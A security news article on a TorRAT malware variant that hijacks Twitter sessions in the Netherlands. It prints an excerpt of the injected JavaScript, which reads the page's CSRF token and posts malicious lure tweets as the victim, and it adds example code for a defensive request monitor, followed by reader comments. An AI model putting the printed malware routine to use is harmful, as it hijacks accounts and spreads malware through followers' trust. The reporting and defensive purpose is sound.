Dana Tamir, Enterprise Security Director for Trusteer, has recently uncovered a variation of the TorRAT banking data malware which has been actively configured to target Twitter users. The attack works by "injecting Javascript code into the victim’s Twitter account page", Tamir says, adding that the malware "collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim". These tweets are used, of course, to spread the malware within the social networking circle by leveraging the trust that is implicit in such networks. Twitter users, generally speaking, follow people and accounts that they trust. When these accounts are compromised by such an attack it becomes quite easy to persuade followers to click through to drive-by malware pages, simply courtesy of the level of implied trust invested in the original poster.

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as "Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris", which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary", and contains a malicious link.
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.

Dana Tamir provided an excerpt from that injected JavaScript code to highlight what is being done:

```javascript
// Excerpt of the injected script as provided by Trusteer. _GetRndMsg, ar and SetO
// are defined elsewhere in the malware and are not part of the excerpt.
function _PostTweet() {
    // Read the CSRF token from Twitter's own form on the page; because the script
    // runs inside the victim's logged-in session, this token makes the API call
    // indistinguishable from one the user made.
    var a = $('input[name="authenticity_token"]').val();
    a.length > 0 && $.post("/i/tweet/create", {
        authenticity_token: a,
        place_id: "",
        status: _GetRndMsg()          // one of the prepared malicious messages
    }).always(function () {
        // Mark the message as sent, persist that state, then reload the page.
        ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
    })
}
```

Trusteer advises that enterprise exploit prevention technology, preventing vulnerable endpoint user applications (browser clients) from being exploited and malware downloaded and executed, is the best way to stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted", Trusteer says. "Such content should only be opened while monitoring the application state to ensure it is operating legitimately".
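As an added illustration of the "monitoring the application state" idea (example code written for this page, not Trusteer's product or Twitter's code), the following in-page monitor records genuine user gestures and flags any POST to the `/i/tweet/create` endpoint named in the excerpt that is not preceded by one, which is exactly how the injected `_PostTweet()` behaves when it fires on page load. The 2-second gesture window and the sample timeline are assumptions constructed for the demonstration.

```javascript
const TWEET_CREATE_PATH = "/i/tweet/create"; // endpoint used by the injected script above
const GESTURE_WINDOW_MS = 2000;              // assumption: a real post follows a gesture within 2 s
// Tracks the last genuine user gesture and judges each tweet-create request against it.
function createMonitor(windowMs = GESTURE_WINDOW_MS) {
  const state = { lastGestureAt: -Infinity, alerts: [] };
  return {
    recordGesture(ts) { state.lastGestureAt = ts; },
    // True for requests that look user-driven; false (plus an alert) for a POST to the
    // tweet endpoint with no recent gesture, e.g. one fired straight from page load.
    checkRequest(req) {
      if (req.method !== "POST" || req.path !== TWEET_CREATE_PATH) return true;
      const age = req.ts - state.lastGestureAt;
      if (age >= 0 && age <= windowMs) return true;
      state.alerts.push({ ts: req.ts, status: req.body.status, reason: "tweet created without user gesture" });
      return false;
    },
    alerts() { return state.alerts.slice(); },
  };
}

// Browser-only wiring: hook XMLHttpRequest (which jQuery's $.post uses) and count only
// trusted input events, since a script can dispatch synthetic ones. No-op under Node.
function installHook(mon) {
  if (typeof XMLHttpRequest === "undefined" || typeof document === "undefined") return false;
  const open = XMLHttpRequest.prototype.open;
  const send = XMLHttpRequest.prototype.send;
  XMLHttpRequest.prototype.open = function (method, url, ...rest) {
    this._mon = { method: String(method).toUpperCase(), path: new URL(url, location.href).pathname };
    return open.call(this, method, url, ...rest);
  };
  XMLHttpRequest.prototype.send = function (body) {
    const params = new URLSearchParams(typeof body === "string" ? body : "");
    mon.checkRequest({ ...this._mon, ts: Date.now(), body: { status: params.get("status") } });
    return send.call(this, body);
  };
  for (const type of ["click", "keydown"]) {
    document.addEventListener(type, ev => { if (ev.isTrusted) mon.recordGesture(Date.now()); }, true);
  }
  return true;
}

// Constructed sample timeline: a genuine tweet 0.5 s after a click, then a script-driven
// post with no gesture for 8 s, which is what the excerpt above does on load.
function runSample() {
  const mon = createMonitor();
  mon.recordGesture(1000);
  const ok = mon.checkRequest({ method: "POST", path: TWEET_CREATE_PATH, ts: 1500, body: { status: "hello" } });
  const flagged = mon.checkRequest({ method: "POST", path: TWEET_CREATE_PATH, ts: 9000, body: { status: "check zijn salaris" } });
  return { ok, flagged, alerts: mon.alerts() };
}
```

A hook like this only sees requests made through the page's XMLHttpRequest, so malware that patches the browser process itself, as TorRAT does, can still bypass it; that is why Trusteer places the control at the exploit-prevention layer rather than in page script.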

About the Author

A freelance technology journalist for 30 years, I have been a Contributing Editor at PC Pro (one of the best selling computer magazines in the UK) for most of them. As well as currently contributing to Forbes.com, The Times and Sunday Times via Raconteur Special Reports, SC Magazine UK, Digital Health, IT Pro and Infosecurity Magazine, I am also something of a prolific author. My last book, Being Virtual: Who You Really Are Online, was published in 2008 as part of the Science Museum TechKnow Series by John Wiley & Sons. I am also the only three-time winner (2006, 2008, 2010) of the BT Information Security Journalist of the Year title, and was humbled to be presented with the ‘Enigma Award’ for a ‘lifetime contribution to information security journalism’ in 2011 despite my life being far from over...

LastMitch

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as "Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris", which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary", and contains a malicious link.

This sounds like an isolated incident, maybe not if it starts spreading, but it's good to know. So I can be aware of this JavaScript code.

Not sure why they used this phrase:

Our new King William will earn even more than Beatrix. Check his salary

What's the meaning behind it?

To me it meant

Wee kin william will earn even mooar than beytrix. check 'is salary 
diafol

Interesting. But how does the js get into a stored post in the first place? How is the script injected? I can understand that the js code is sent to the server, but doesn't Twitter screen and strip any possible malicious code?